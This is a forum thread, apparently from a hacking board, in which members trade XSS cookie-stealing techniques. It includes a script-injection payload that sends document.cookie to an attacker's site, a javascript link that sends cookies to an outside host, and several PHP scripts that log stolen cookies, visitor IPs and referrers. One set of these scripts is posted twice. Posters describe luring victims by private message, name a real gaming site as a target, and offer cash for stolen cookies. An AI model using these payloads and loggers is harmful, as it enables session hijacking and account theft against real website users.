Stealing Cookie With XSS

Discussion in 'Ethical hacking Tips' started by fourthdimension, Apr 23, 2009.

  1. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    The script that you are trying is wrong. Try this:

    http:// w w w .victimsite.com/forums/search.php?query="><script>document.location="http://yoursite.com/cookiestealer?c=" + document.cookie</script>
     
  2. Toddie

    Toddie New Member

    Joined:
    Jan 9, 2010
    Messages:
    52
    Likes Received:
    2
    Trophy Points:
    0
    Thank you for your timely responses.

    After using that code I am now getting the information and the cookie logged properly.
    however the page still does not redirect.

    I am using firefox 3.5.7 I don't know if that makes any difference.
     
  3. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    pm me with the info..
     
  4. Toddie

    Toddie New Member

    Joined:
    Jan 9, 2010
    Messages:
    52
    Likes Received:
    2
    Trophy Points:
    0
    turns out the issue is the host, the code works fine.
     
  5. m93

    m93 New Member

    Joined:
    Nov 13, 2009
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    0
    if i want test this script on myself what should i do? (logging in a forum or test that in firefox or ie?)
     
  6. ginoside021

    ginoside021 Banned

    Joined:
    Apr 10, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    can you teach me how to make this cookiestealer
     
  7. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    Go through this entire thread. I think i have explained most of the things.
     
  8. ginoside021

    ginoside021 Banned

    Joined:
    Apr 10, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    i tried to make one regarding on the tut but mine is not workin can you help me plsss

    i add you in my yahoo inocentjacky is my yahoo ID plssss
     
  9. shadowman32

    shadowman32 New Member

    Joined:
    Jun 26, 2010
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    i dont understand something...

    for example if i put this cod as a index page

    <a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+
    document.cookie)">Click Me</a>

    and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job

    i guess i do something wrong because none of them works. below are the stealer script that i use:
    1
    HTML:
     <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>
    2
    HTML:
    <?php 
    
    function GetIP() 
    { 
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
            $ip = getenv("HTTP_CLIENT_IP"); 
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
            $ip = getenv("HTTP_X_FORWARDED_FOR"); 
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
            $ip = getenv("REMOTE_ADDR"); 
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
            $ip = $_SERVER['REMOTE_ADDR']; 
        else 
            $ip = "unknown"; 
        return($ip); 
    } 
    
    function logData() 
    { 
        $ipLog="log.txt"; 
        $cookie = $_SERVER['QUERY_STRING']; 
        $register_globals = (bool) ini_get('register_gobals'); 
        if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
        else $ip = GetIP(); 
    
        $rem_port = $_SERVER['REMOTE_PORT']; 
        $user_agent = $_SERVER['HTTP_USER_AGENT']; 
        $rqst_method = $_SERVER['METHOD']; 
        $rem_host = $_SERVER['REMOTE_HOST']; 
        $referer = $_SERVER['HTTP_REFERER']; 
        $date=date ("l dS of F Y h:i:s A"); 
        $log=fopen("$ipLog", "a+"); 
    
        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>"); 
        else 
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n"); 
        fclose($log); 
    } 
    
    logData();
    
    echo '<b>Page Under Construction</b>'
    
    ?>
    3
    HTML:
    <?php
    $cookie = $_GET['c'];
    $ip = getenv (‘REMOTE_ADDR’);
    $date=date(“j F, Y, g:i a”);;
    $referer=getenv (‘HTTP_REFERER’);
    $fp = fopen(‘cookies.html’, ‘a’);
    fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
    fclose($fp);
    header (“Location:TechMafias”);
    ?> 
    Please help me...my account on a web site was stolen and i want to get it back.
     
  10. Toddie

    Toddie New Member

    Joined:
    Jan 9, 2010
    Messages:
    52
    Likes Received:
    2
    Trophy Points:
    0
    try using a different web host.
     
  11. shadowman32

    shadowman32 New Member

    Joined:
    Jun 26, 2010
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    i have changed the host but stil dosent work...i get something like this

    HTML:
     IP: 92.83.149.140 | PORT: 25710 | HOST:  |  Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.25 Safari/532.5 | METHOD:  | REF: h t t p ://extra-ratie.hi2.ro/ |  DATE: Saturday 26th 2010f June 2010 11:54:17 PM | COOKIE:  cookie= 
    
    the script dosent "steal" the cookie...

    Can someone give me a good script?...i want to send the link that victim will acces via PM.
     
  12. m93

    m93 New Member

    Joined:
    Nov 13, 2009
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    0
    this code is completely out of work!!! it didnt work for me. i think its better to forget about stealing cookie..i couldnt find useful codes anywhere
     
  13. shadowman32

    shadowman32 New Member

    Joined:
    Jun 26, 2010
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    i will keep searching until i will found a good XSS cookie stealer script...and i will post it here when i will found it.

    thanks for help
     
  14. rayjay

    rayjay New Member

    Joined:
    Jan 12, 2011
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    0
    for example if i put this cod as a index page

    <a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+
    document.cookie)">Click Me</a>

    and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job

    i guess i do something wrong because none of them works. below are the stealer script that i use:
    1
    HTML:
     <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>
    2
    HTML:
    <?php 
    
    function GetIP() 
    { 
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
            $ip = getenv("HTTP_CLIENT_IP"); 
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
            $ip = getenv("HTTP_X_FORWARDED_FOR"); 
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
            $ip = getenv("REMOTE_ADDR"); 
        else if (isset($_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown")) 
            $ip = $_SERVER['REMOTE_ADDR']; 
        else 
            $ip = "unknown"; 
        return($ip); 
    } 
    
    function logData() 
    { 
        $ipLog="log.txt"; 
        $cookie = $_SERVER['QUERY_STRING']; 
        $register_globals = (bool) ini_get('register_gobals'); 
        if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
        else $ip = GetIP(); 
    
        $rem_port = $_SERVER['REMOTE_PORT']; 
        $user_agent = $_SERVER['HTTP_USER_AGENT']; 
        $rqst_method = $_SERVER['METHOD']; 
        $rem_host = $_SERVER['REMOTE_HOST']; 
        $referer = $_SERVER['HTTP_REFERER']; 
        $date=date ("l dS of F Y h:i:s A"); 
        $log=fopen("$ipLog", "a+"); 
    
        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | COOKIE:  $cookie <br>"); 
        else 
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |   Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | COOKIE:  $cookie \n\n"); 
        fclose($log); 
    } 
    
    logData();
    
    echo '<b>Page Under Construction</b>'
    
    ?>
    3
    HTML:
    <?php
    $cookie = $_GET['c'];
    $ip = getenv (‘REMOTE_ADDR’);
    $date=date(“j F, Y, g:i a”);;
    $referer=getenv (‘HTTP_REFERER’);
    $fp = fopen(‘cookies.html’, ‘a’);
    fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date  and Time: ‘ .$date. ‘<br> Referer:  ‘.$referer.’<br><br><br>’);
    fclose($fp);
    header (“Location:TechMafias”);
    ?> 
    Please help me...my account on a web site was stolen and i want to get it back.
     
  15. rayjay

    rayjay New Member

    Joined:
    Jan 12, 2011
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    0
    Does anybody know where my code doesn't work? It displays everything but the cookie. The site is kind of trick but it allows and .. which translates into html code as <img src=""></img> and <a href=""></a>.

    My PHP:

    1
    HTML:
     <?php
    $cookie =$HTTP_GET_VARS["cookie"];
    $date = date ("l ds of F Y h:i:s A");
    $ip = $_SERVER['REMOTE_ADDR'];
    $file = fopen('log.txt', 'a');
    fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie \n");
    fclose($file);
    ?>
    I've tried many different modifications on the site. For example,
     
  16. rayjay

    rayjay New Member

    Joined:
    Jan 12, 2011
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    0
    I can't understand how this forum works properly lol. The website is crossfire.nu is that helps anybody. Posts are done via UBBcode. I hope somebody can help.

    Indianman, tenu punjabi aandi ah?
     
  17. rayjay

    rayjay New Member

    Joined:
    Jan 12, 2011
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    0
    So if somebody can tell me the problem it would be really nice .. anybody that is willing to help me and can help me steal cookies of this site will receive a cash reward aswell :P
     
  18. marehotz

    marehotz New Member

    Joined:
    Feb 28, 2011
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    admin , i want to hack a lineage 2 website and log as administrator . Is that possible? pls reply



    Thx.
     
  19. Mr.sp41t3r

    Mr.sp41t3r New Member

    Joined:
    Jun 14, 2009
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    0
  20. nikita

    nikita New Member

    Joined:
    Dec 13, 2012
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    sir my log.txt file contains only JSESSIONID=some value;

    can u pls tell me what to do with JSESSIONID.
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice